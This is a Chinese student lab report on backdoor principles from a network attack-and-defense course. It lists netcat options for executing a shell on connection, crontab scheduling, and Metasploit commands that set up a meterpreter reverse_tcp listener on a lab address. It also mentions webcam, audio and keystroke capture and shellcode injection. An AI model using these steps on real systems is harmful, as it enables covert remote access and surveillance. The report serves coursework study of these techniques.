其他分享
首页 > 其他分享> > 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week3 20165326

2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week3 20165326

作者:互联网

Exp2 后门原理与实践

目录

1. 实验原理
2. 实验内容
3. 问题回答
4. 心得体会

实验原理简介

*** 常用参数选项说明***
nc -h查看
-4 使用IPV4
-6 使用IPV6
-c, --sh-exec <command> 接收到的命令通过command(例如/bin/bash)执行
-e, --exec <command> 和-c差不多
--lua-exec <filename> 接收到的数据通过脚本filename执行
-m, --max-conns <n> 最大并发连接数(单独开启不生效,需配合--keep-open/--broker使用)
-d, --delay <time> 读写收发间隔时间
-o, --output <filename> 将会话数据转储到文件
-i, --idle-timeout <time> 读写超时时间
-p, --source-port port 指定连接使用的源端口号(client端使用)
-s, --source addr 客户端指定连接服务器使用的ip(client端使用)
-l, --listen 绑定和监听接入连接(server端使用)
-k, --keep-open 在监听模式中接受多个连接(配合-m使用)
-n, --nodns 不使用DNS解析主机名
-t, --telnet 响应telnet连接
-u, --udp 使用udp协议,默认tcp
-v, --verbose 显示详细信息
-w, --wait <time> 连接超时时间
--allow 允许指定主机连接
--allowfile 允许指定文件内的主机连接
--deny 拒绝指定主机连接
--denyfile 拒绝指定文件内的主机连接
--broker 启用代理模式
--proxy <addr[:port]> 指定代理主机ip和port
--proxy-type <type> 指定代理类型("http" or "socks4")
--proxy-auth <auth> 代理身份验证

应用实例

back↑


实验内容

Windows获得Linux Shell
*** 相关命令 ***
开机就启动cron进程的设置命令:chkconfig --add crond
把cron加入到启动脚本中:
rc-update add vixie-cron default
crontab -l  #查看你的任务
crontab -e #编辑你的任务
crontab -r #删除用户的crontab的内容

*** 定时设置 ***
//前一部分是对时间的设定,后面一部分是要执行的命令
//附: Crontab 的格式说明如下:
* 逗号(',') 指定列表值。如: "1,3,4,7,8"
* 中横线('-') 指定范围值 如 "1-6", 代表 "1,2,3,4,5,6"
* 星号 ('*') 代表所有可能的值

//举例
0 */2 * * * echo "have a break now." > /tmp/test.txt
//每两个小时
0 23-7/2,8 * * * echo "have a good dream:)" > /tmp/test.txt    //晚上11点到早上8点之间每两个小时,早上八点
0 11 4 * 1-3 command line //每个月的4号与每个礼拜的礼拜一到礼拜三的早上11点
use exploit/multi/handler  //使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload
set LHOST 192.168.80.131
set LPORT 5326  //设置地址和端口号
exploit   //执行监听

此时在就能运行windows的shell

Ⅳ.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

更多相关实例我就没有截图了,学习可以看最上面知识介绍的链接

Ⅴ.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

payloadshellcode的区别

Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情。

参考资料

back↑


问题回答

标签:cron,exe,20165326,Exp2,192.168,5326,2019,主机,连接
来源: https://www.cnblogs.com/Czzzz/p/10589692.html